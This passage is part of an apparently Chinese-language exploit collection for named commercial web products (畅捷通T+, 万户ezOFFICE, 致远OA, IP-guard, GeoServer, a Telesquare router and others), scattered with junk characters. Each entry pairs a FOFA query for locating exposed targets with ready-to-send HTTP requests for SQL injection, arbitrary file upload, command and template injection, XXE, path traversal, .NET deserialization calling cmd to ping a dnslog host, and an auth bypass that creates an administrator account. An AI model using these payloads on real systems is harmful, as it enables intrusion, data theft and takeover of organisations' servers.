, a% w) v/ T7 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
- e% X6 `$ ^1 p/ ~! t) v0 {% AContent-Type: application/json2 a0 l3 B$ s* c/ _- Y
5 A9 g5 w, K5 L- d{1 O; e" e* M1 D# X3 S
"storeID":{
3 Y" g: _4 X; A1 g0 E7 w4 d "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",+ ^" L0 S" F5 F! M( W
"MethodName":"Start",4 V9 o1 S$ e: s1 E, ]) y; L' h# E
"ObjectInstance":{
% T; ^8 l' |% Y: C# H) y- A) p "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," {& ]4 L' O- o2 m, H1 j: k2 J9 V/ l- F
"StartInfo": {3 l. J1 R1 o4 }! x7 X% g
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) J" M4 c8 u( y0 A R+ ^1 H
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"; W9 c$ c2 V( e2 s% Y% c3 w% C
}: q( R+ E. `# h$ ]! _6 N b: `8 ]$ ~
}- Q9 A& f+ v6 J6 \9 G# ]. L0 f" I# e
}
6 s/ P. q. b6 b$ @; l# n7 W}/ M0 ^" U0 p1 }6 O: f& J- s& ?# _
( P. b4 x/ i( _: ^: P& N3 e2 i: z; n) ?% B9 @
57. 畅捷通T+ keyEdit.aspx SQL注入
, ]5 E2 Y6 X, Q, [# PFOFA:app="畅捷通-TPlus"$ p& |5 } @0 s! C- X! ?5 v' f
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.10 A/ _5 k/ G9 E9 ^3 F/ e( C) r
Host: host
& M! O5 H' d- c7 [5 ^User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' G4 D6 Z7 k" f) R2 H
Accept-Charset: utf-8
& N% m' W$ z; o9 F2 d& pAccept-Encoding: gzip, deflate9 c' j: M+ k2 S" b4 T
Connection: close
% ]2 G: q# c) d1 r1 x3 s2 x) ^3 J9 L5 s8 p f
& w3 U: D7 g/ w8 h
58. 畅捷通T+ KeyInfoList.aspx sql注入
, C% I* G H% ?8 n5 |' S, {FOFA:app="畅捷通-TPlus"
4 S: P- G- g# g- y$ F/ R4 B! oGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.10 D4 X: e! E/ }: ]' `+ l6 Z! ^, C
Host: your-ip
& s5 U# O) H, m- yUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ F: A1 w- s; i/ G
Accept-Charset: utf-8$ }' F' s/ u: z* w; N# T
Accept-Encoding: gzip, deflate0 |: l& r$ d6 [( J
Connection: close
/ t' X, ^* A. D, A0 l
' r* M" t* k% z, ]! L
) a$ R; A+ K1 {* b3 @$ ~+ z59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
0 a; o" H8 u' Z( JFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
! r- X) U) u. n$ C/ @' H' q2 gPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1( b5 [1 z! h) Q( Z& Q( v& f
Host: 192.168.86.128:9090& [, _+ Y% B& L9 s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 P) O) A+ K; k3 G) X( o
Connection: close. s% |4 n1 t( U7 k% e8 {
Content-Length: 1669
* G! [6 _1 @: U' X* K0 S$ XAccept: */*
3 k9 _; C. x( n3 R" u9 s5 tAccept-Language: en% U* F. U9 l* n; U3 ]
Content-Type: application/x-www-form-urlencoded! S% I( R6 A; i7 `5 m. d% I; Q
Accept-Encoding: gzip+ Q+ V V% A5 _8 O
. k* z* @) m( @. I9 m; ]# {
PAYLOAD
2 H7 g4 I+ t. e- a. |& V5 j* b9 A9 E4 M2 g
. }6 q- b. j5 e0 @9 Z
60. 百卓Smart管理平台 importexport.php SQL注入3 H6 _: `. G/ Q* E) ?8 V
FOFA:title="Smart管理平台"7 M) x/ e- E- F1 D- x/ M$ J
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1, E' X/ i6 K) S7 J+ \
Host:3 Y# Y# `/ E" o" c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" M* Z6 w% T, w y E" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 G4 E$ A6 w7 |( o6 W, O2 w0 f BAccept-Encoding: gzip, deflate3 \& e$ q& R* R) t; P
Accept-Language: zh-CN,zh;q=0.9
( ]. p% W5 F" j( y4 d/ V3 a DConnection: close
/ Y& Q3 @* M* E1 B/ Z& G
1 ?* t. ^# \% K/ G! u' w: `! p, `" s1 T X, P8 H, w% ]; m" K
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
) w" i5 w: b/ `2 c- u: r( c# hFOFA: title="欢迎使用浙大恩特客户资源管理系统"
$ V9 @6 s- f0 |1 |( D$ @POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
* V) q% ` I# p+ OHost: x.x.x.x
2 r+ h* d* z! h2 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 }# v* \% p( n. A" Y: C& F! }Connection: close9 V5 E* `* C/ L4 y- I9 p0 K, F2 A
Content-Length: 273 z/ z" E0 y. q( b2 C0 H7 t+ e9 R
Accept: */* u- I9 x3 r8 E) U: t- P/ N
Accept-Encoding: gzip, deflate6 R: ?: A$ R, o% \2 }" F, w. m2 S
Accept-Language: en
! O" r' z/ l! P: l1 | v1 d% VContent-Type: application/x-www-form-urlencoded
9 c0 [/ Y% D/ Q4 p' r& P5 Y" D; C( k/ d6 c
8uxssX66eqrqtKObcVa0kid98xa2 b( ?# |: j7 V3 e1 r% z
: C) H8 S% I e" O: R4 ~3 |! H7 _
% u( n$ N9 j% I/ C/ g6 |! v) z7 d62. IP-guard WebServer 远程命令执行8 _# S/ q- F- t6 M) F" k% x, g3 d. k
FOFA:"IP-guard" && icon_hash="2030860561"; t7 G* B9 u+ X' \4 W9 V' Y
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1$ {' M4 \) @( ~7 w2 C
Host: x.x.x.x0 V- Z7 v9 n& m0 Q# y( i; L" P2 @; \
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.362 t5 f' F$ g( n/ c& _2 x
Connection: close
* |9 F3 e- J8 G, x3 R0 F$ r5 dAccept: */*, G* u0 _6 V, M" V& u' R$ ?
Accept-Language: en
6 w6 b! X( j! g8 ?% F$ L1 XAccept-Encoding: gzip# D- ~, f( t( `' X
6 D# e. C# K3 z+ t x5 |9 O$ Z9 ]2 f2 c2 h& Q
访问+ _2 a, |3 K* W4 p! X5 p
" c6 x4 r: z3 v
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! i) B0 S# ^3 k3 Z$ _
Host: x.x.x.x- q" J! m X" d7 f( W' k$ z; m# w* b6 C
2 @ I8 c4 J% z1 `1 P! P
8 Q0 b6 [7 ?, H63. IP-guard WebServer任意文件读取
' d y3 g0 C7 Y2 W. g# mIP-guard < 4.82.0609.0
$ l$ _; ~( E( }9 q6 aFOFA:icon_hash="2030860561"
9 k5 U! U" P0 v4 NPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
w( P, F. H; Z+ @2 y+ aHost: your-ip
5 u% M8 t( ]7 P, uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# g: u$ v1 p" w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 x' R7 v! L- J( K2 |& ]: e0 [Accept-Encoding: gzip, deflate' q- R( o" j3 @) u5 {
Accept-Language: zh-CN,zh;q=0.9
( c* G* T% }. @9 d- P3 K" ZConnection: close0 Q7 q9 ~! H o! K3 y% j
Content-Type: application/x-www-form-urlencoded
0 C7 u% {; i# O _# c7 Q
6 F/ C9 p' J6 a N) h0 } j4 h G3 Rpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
: N1 j6 i' F0 \. V7 ~
9 M# K! i9 V! y- a" m% ]2 M64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: X- ]! p6 l$ J f/ u+ TFOFA:body="/Scripts/EnjoyMsg.js"
2 T& K7 S# m- q/ i: FPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
" |, f; ~) g2 L" W* pHost: 192.168.86.128:9001
* e8 M( v( T" ~# p/ O. }2 ?User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
- Y, `- k4 |5 s' q5 _Connection: close7 u7 w& T4 `7 J! H2 h6 S0 C
Content-Length: 369
7 x/ f. Z+ _8 N% L/ kAccept: */*: {& F$ ~6 r/ M% L# g
Accept-Language: en% q+ \( O4 \$ K* b7 a0 R7 q
Content-Type: text/xml; charset=utf-81 o( t4 z1 n2 j6 w3 ~
Accept-Encoding: gzip
: ~/ h- N5 d- r' \' g9 ~7 k8 J; J( k% O' U" _) Y4 I
<?xml version="1.0" encoding="utf-8"?>( J$ I& D) Y2 A1 B: M# v$ R& y
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; Y! _8 {) v/ A# r4 m! y<soap:Body>
5 z% i( U5 j4 I7 \4 _# ^* j <GetOSpById xmlns="http://tempuri.org/">% p; C/ J# F* Y3 j
<sId>1';waitfor delay '0:0:5'--+</sId>
- d6 Z; x7 t6 \# c+ {1 ` </GetOSpById>
6 y v# V9 f8 I </soap:Body>% j5 o) t) ]" q( |( h$ u' ^
</soap:Envelope>
! b1 h# O$ T2 s }: B
' ?; I1 n+ U% x# Y/ I" I2 k5 T# F1 V; s& q& Y7 P
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
% Y+ I5 V! Z+ q7 PFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
' `% g2 p# U( \响应200即成功创建账号test123456/123456
0 {) G" m2 X; n/ D/ z3 w8 }3 yPOST /SystemMng.ashx HTTP/1.1
: s/ m, Q& k8 WHost:" X# q0 z3 H$ P
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)) O) _# e3 F( z/ x n1 F4 b6 L
Accept-Encoding: gzip, deflate
7 C* u6 T" T) g6 F W" e7 H: sAccept: */*" ~# ]/ @) N. M, l# p" o6 q
Connection: close, o0 G: ?" {$ F2 [" w2 i' N
Accept-Language: en
) R7 B. W6 t3 j' iContent-Length: 174; z+ k( B; L" m* R# T6 v
# L' T5 F2 v/ D+ ?$ @operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
. R8 F* v/ ~( [: X6 H. q; l
! E! k/ ~" [# i
0 i2 S, s! w, V* g" R( [66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入5 {* Y5 p* D5 V, ]
FOFA:app="万户ezOFFICE协同管理平台"! V$ P g8 e! X, ~0 s# n
$ z5 o1 W0 \5 b( ]2 V7 @
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
+ n/ i% v" V* P& y {% o7 SHost: x.x.x.x
/ y9 J$ f' c/ l- wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36; Y- p- u7 d8 y# a) c1 Z7 F8 a
Connection: close
! c/ P; B3 D+ ] j9 Q K+ mAccept: */*+ f/ i, S5 |2 y& L8 @( G
Accept-Language: en+ N! ~( ^" d6 Z2 c s0 L& U
Accept-Encoding: gzip; f6 O$ P) ]/ `3 L" C0 Z0 S2 x
- M1 n3 d1 h$ A: }7 _
0 U: l1 P+ q( }* @* f2 H第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在3 z) T5 I; y8 A- l y9 \
~: z3 N, o2 t5 A, d! h
67. 万户ezOFFICE wpsservlet任意文件上传
2 B( L* }/ A7 n @4 uFOFA:app="万户网络-ezOFFICE"
* ~0 P3 g# {) a, D" gnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型, |( ^6 v$ v* r
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.13 m& r/ A, \7 w- a5 p
Host: x.x.x.x3 F5 t) z* V E# \' a+ d& e9 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- S8 Y, Q5 |) |8 o$ Y3 K& j* u3 gContent-Length: 173) O) j0 ^% w# M5 [( i8 m1 k4 F! P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
q# m8 b5 Z% l" E. k4 M8 p1 gAccept-Encoding: gzip, deflate% r# z2 v" E0 W6 r- Q2 B5 _. ?
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
8 |* S+ ]" H& j+ } ?3 p' {Connection: close/ x8 x2 |: w. E& D' O
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp2 z% ^" U6 \% G5 ?) g* |( A8 q
DNT: 1
. X" i* u7 w9 m" MUpgrade-Insecure-Requests: 1- F/ M1 s8 ^2 p
* T- _" a/ M8 \4 j7 r& [
--ufuadpxathqvxfqnuyuqaozvseiueerp6 p) r: p. N$ _# T
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
8 b$ }. G- ^" D4 o
; i" o) w. ]! R<% out.print("sasdfghjkj");%>
N9 r4 Z$ Y1 `" d) u! g--ufuadpxathqvxfqnuyuqaozvseiueerp--- O' _! h. R [" T: ~
! g4 d! ?" ^! Y7 {& w& H0 A8 o& B
$ L+ V5 r7 ]% N& R文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
7 n/ o% ^9 r* r8 D; u) X3 e7 u* [/ j1 b
68. 万户ezOFFICE wf_printnum.jsp SQL注入
' k+ Q, W: w* o. Y3 X4 b; r# |FOFA:app="万户ezOFFICE协同管理平台" t, b$ F7 y% x- e9 v( S
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
! [ T8 d/ @& j2 u4 cHost: {{host}}
7 ^* X+ v ~' p6 ?1 U! VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36- J3 }, C0 [ v3 `( L, n5 f: o
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8 N; W- v5 }7 Y8 A6 Y3 f1 B
Accept-Encoding: gzip, deflate7 j' G" e* _9 d9 Y
Accept-Language: zh-CN,zh;q=0.9
- f, t* S; r; m' `Connection: close
: [3 C4 }3 h+ ^6 _! V, g3 y/ q: Z8 G0 ?
* P# t" c k5 G( b& A
69. 万户 ezOFFICE contract_gd.jsp SQL注入
2 Y# Y5 ?4 z( v5 B8 h' }+ e$ hFOFA:app="万户ezOFFICE协同管理平台"
& H8 h6 |0 ]+ {8 DGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
- S" ^0 q R6 F# |Host: your-ip! H* o0 U# i. [
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
& ~% T& _9 E% FAccept-Encoding: gzip, deflate( a; u$ B) M" T( w/ H6 O' j% ]& v
Accept: */*
: U2 D$ Q! {* z& T" ^+ q s" CConnection: keep-alive
5 N# o3 j; J- G4 @. G; V+ E' S
5 b( a" B$ o& @2 s5 t1 n7 M8 \1 @# d
$ |$ A4 c3 E6 W& ]# \70. 万户ezEIP success 命令执行% h' M" p d/ m. h' Q
FOFA:app="万户网络-ezEIP"& q8 P1 P2 i) `& D. v- }2 J
POST /member/success.aspx HTTP/1.1
1 k" [' n2 B7 A Z2 C+ Y' |; ?. ?Host: {{Hostname}}; Y" ~4 u& S# o, N& @9 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% {8 D* f- z2 n0 q+ sSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
$ G7 ~- c4 M" ^8 n! L' J1 f: u$ hContent-Type: application/x-www-form-urlencoded
: W6 m k. c6 j" p/ d# ?1 `TYPE: C
* V9 w3 _: x) d% P, }+ c5 e, @/ VContent-Length: 16702
* m! p2 ?2 r m. R; ?! M
+ ~. l/ y2 F9 @( p" ___VIEWSTATE=PAYLOAD
( o) O: ]' ]/ M9 k+ D' o& W6 e) a8 M/ C0 I, l/ o* P' X& w$ w/ B( o
4 |5 i- t) v6 S& w71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入! ~2 ?3 m2 h2 l+ W4 {) N4 s, N" u
FOFA:body="PM2项目管理系统BS版增强工具.zip"
7 P2 P. M, G) V) M+ XGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1& ]1 C/ Q! i6 y) M: q) ^
Host: x.x.x.xx.x.x.x" P/ o+ P0 H: Q# v* [
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.367 \2 k, c( F6 ]% j) @& P4 B5 Z
Connection: close+ y! C `# g. G5 L+ Z/ n) d2 s) g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. t3 d. B; l2 \$ Y' v: A
Accept-Encoding: gzip, deflate* ]& L/ ?- E: E$ \3 V6 T0 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: G3 e* n1 ?7 c; b6 n/ QUpgrade-Insecure-Requests: 1
q4 j' y; j5 s3 Q, b) y
0 ^. T8 y7 H7 U" K4 f8 p" V9 O! q: }! o, D: X) Y
72. 致远OA getAjaxDataServlet XXE
7 O# T8 J$ \1 |FOFA:app="致远互联-OA"8 O" {8 s" P! R# O3 d
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1$ t" t' f1 W' q: ]# J* q
Host: 192.168.40.131:8099
0 B7 j# D; G, Q. f" rUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
, [- C, V6 i8 D/ _Connection: close1 E# ?# U L& D3 p! J& {8 x7 Y
Content-Length: 583
# q4 a1 Q0 D( S$ J8 n& a; o5 M' |Content-Type: application/x-www-form-urlencoded
! b1 H* ^/ q" A* J( YAccept-Encoding: gzip
: j& v( }, P( o7 R- O+ ^; [* ]: f" I: o
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E; K% `; c# D4 J/ O
0 i" ?* |% R" L8 z0 r4 |2 Y. @5 I
: E _% f0 F, |- j r5 e73. GeoServer wms远程代码执行
+ J A* ^. Y* } k' v8 e$ r# F( YFOFA:icon_hash=”97540678”+ x" D) D1 y$ D; z" x% |
POST /geoserver/wms HTTP/1.1' U2 S. |& g1 ?. \. t2 ?8 c5 s
Host:
- A, W- q1 ]0 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) R: U/ i! ~6 l4 {2 Y
Content-Length: 19818 H4 }8 j6 i# q# b6 G
Accept-Encoding: gzip, deflate2 z* A2 x3 m; x
Connection: close2 Q% [) ~1 M0 v; m+ z3 q
Content-Type: application/xml
) h4 g6 O2 }+ D. o0 U1 z" A) m3 iSL-CE-SUID: 36 g A* F% I" n8 Z* F: o' ^
* |9 I8 B( d8 m& K/ s- ~PAYLOAD; y4 s8 i7 u; D6 ]0 m0 H
( h2 b; l W* S, k
' I. i! m* b& l2 s6 U5 e5 L
74. 致远M3-server 6_1sp1 反序列化RCE
9 g; r7 F4 y9 e$ mFOFA:title="M3-Server"5 u- B6 D* W8 n* `
PAYLOAD
: s: z1 K; j# Y! h2 {0 s) c7 h! E$ W/ I I) Z7 O
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
9 Y3 f1 g5 j9 i5 v- f( l4 gFOFA:app="TELESQUARE-TLR-2005KSH"
8 t( u$ g8 H/ Q1 FGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
! E' f" J" @+ u. y0 @Host: x.x.x.x
' Q$ ]- G4 K( z1 H9 H% ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 z# C; I+ P/ N- FConnection: close$ S/ r0 L" E- b6 c" U: S
Accept: */*
" w( |" n9 \4 W9 z" H$ o8 v% OAccept-Language: en
) l4 p% @+ p" X: E3 p& m& RAccept-Encoding: gzip4 L5 c8 M8 f) t# \* Z, K
4 T# o% B& c+ l7 q1 N
8 p9 I. u# l) o& x, X: L. h: SGET /cgi-bin/test28256.txt HTTP/1.1
" M5 L1 E9 b( [. {: [+ B# vHost: x.x.x.x8 I( ~) |& o5 X, l
3 P" v; F' a# F* S; P
1 `% O0 L2 X6 M: U" n# G76. 新开普掌上校园服务管理平台service.action远程命令执行
$ o; v1 G& P8 e3 G% @, {5 Z7 zFOFA:title="掌上校园服务管理平台"; g( ~2 g N: \& v4 I Z
POST /service_transport/service.action HTTP/1.1. U4 v" ~4 Y& N( Y: S
Host: x.x.x.x
& i# Q' U+ X" k2 x0 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ w: e5 M' \) C6 y, @+ y0 h) C! DConnection: close, L' p9 I$ e" S, x: U7 R: _% p
Content-Length: 211
* B, ^! ^" {/ v+ cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. B; ?' m$ B3 Q& d4 I8 LAccept-Encoding: gzip, deflate
4 D0 V: L# O7 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; v; t( u# d* O) [5 ~+ ?
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4' h6 T0 U! z( _) j
Upgrade-Insecure-Requests: 1
- d2 ?3 d. v5 O4 ~/ k' B. O$ ]' _6 a6 q' ?3 e$ |6 {7 T7 \
{
5 s" s3 K7 p4 r, ^: ?"command": "GetFZinfo",
) j3 D% a+ P* ~. b "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
" f& Z |8 f7 ~$ L ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
! A) X$ N( T% ^% p& ], [0 F$ P4 w}
3 d( Q- l/ |5 z& `; F2 H8 N2 L/ M
# ~" C; Q( z" W. u# E0 k
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
$ t+ O9 y4 C, x pHost: x.x.x.x+ ?) ?% E" o6 T
$ t+ k+ k: _8 r; c' Q( u% z" y
; D) `+ k2 H, B! S$ G! w7 d: l& h; r( C h4 Q5 z; B1 ]
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 ]( u z) ^0 H$ m* p; n
FOFA:body="F22WEB登陆"9 u9 M% t) F# w8 b( J
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' h1 \. K( u: l X. |; E
Host: x.x.x.x
( p! e# p% g& ]0 [) I; ~$ J, ]$ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' f; ~: M+ s4 q' G& i6 E& RConnection: close% h; q) G7 N2 w
Content-Length: 433
1 x4 a$ E, d2 u. cAccept: */*
2 [: ~! _; v& _ |( U5 QAccept-Encoding: gzip, deflate9 N& h+ y9 y5 [& T! v2 e0 m+ S
Accept-Language: zh-CN,zh;q=0.9$ r/ K: N5 K! x: k6 h+ u
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix% s- c% h( o$ Y$ E
) N$ G. c' A% S7 N
------------398jnjVTTlDVXHlE7yYnfwBoix% x# _' \4 x* H& e* [, v! C$ F
Content-Disposition: form-data; name="folder"
# s9 @) m, e! o+ u8 f3 o. c. R8 M$ b; {3 L
/upload/udplog8 O: b' m: T4 k0 D6 z: M# s' J
------------398jnjVTTlDVXHlE7yYnfwBoix
, y5 P+ Y: \1 N4 R P8 @Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
% D# C8 F* ` fContent-Type: application/octet-stream
2 Z0 c% Q3 L! L
' n- }" z' y8 S3 `* uhello1234567" s, \/ U9 w W! A" L/ Y: u
------------398jnjVTTlDVXHlE7yYnfwBoix! F9 y8 ?2 m( a _# {( j
Content-Disposition: form-data; name="Upload"
7 V& o, ^$ A! I" ^5 r9 `% U
+ B1 ]0 {0 n4 M" R. TSubmit Query
, I9 {& y+ z$ O------------398jnjVTTlDVXHlE7yYnfwBoix--
! K# m0 Y* g* u* X5 Z: o$ ~+ o# l K7 v9 E6 X
0 u5 _, @; W/ j1 Z6 B! F
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传# h9 {# v' ` ^* H5 F* B
FOFA:icon_hash="2001627082" J& @; b5 q3 d# |2 _4 Q# t7 L
POST /Platform/System/FileUpload.ashx HTTP/1.1
$ q6 O1 T s+ r0 K5 YHost: x.x.x.x V# I' |* O. ^4 r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) I$ g+ E8 h+ k4 m7 D0 Q; E, RConnection: close
' x% D! ]( k1 p9 @7 y1 yContent-Length: 336+ Q `2 M- {" B& L& \1 i
Accept-Encoding: gzip
, L+ R" {" v& b, t) T0 e) m7 nContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l; I- i) @, g" M8 q* O
5 k: w( D1 X9 v) V3 Y8 \
------YsOxWxSvj1KyZow1PTsh98fdu6l" |5 J4 E5 `" q; D' w5 r3 j1 G" T
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"# D8 D$ x, z: l& P1 M& \
Content-Type: image/png
" L6 Z3 S) M% H
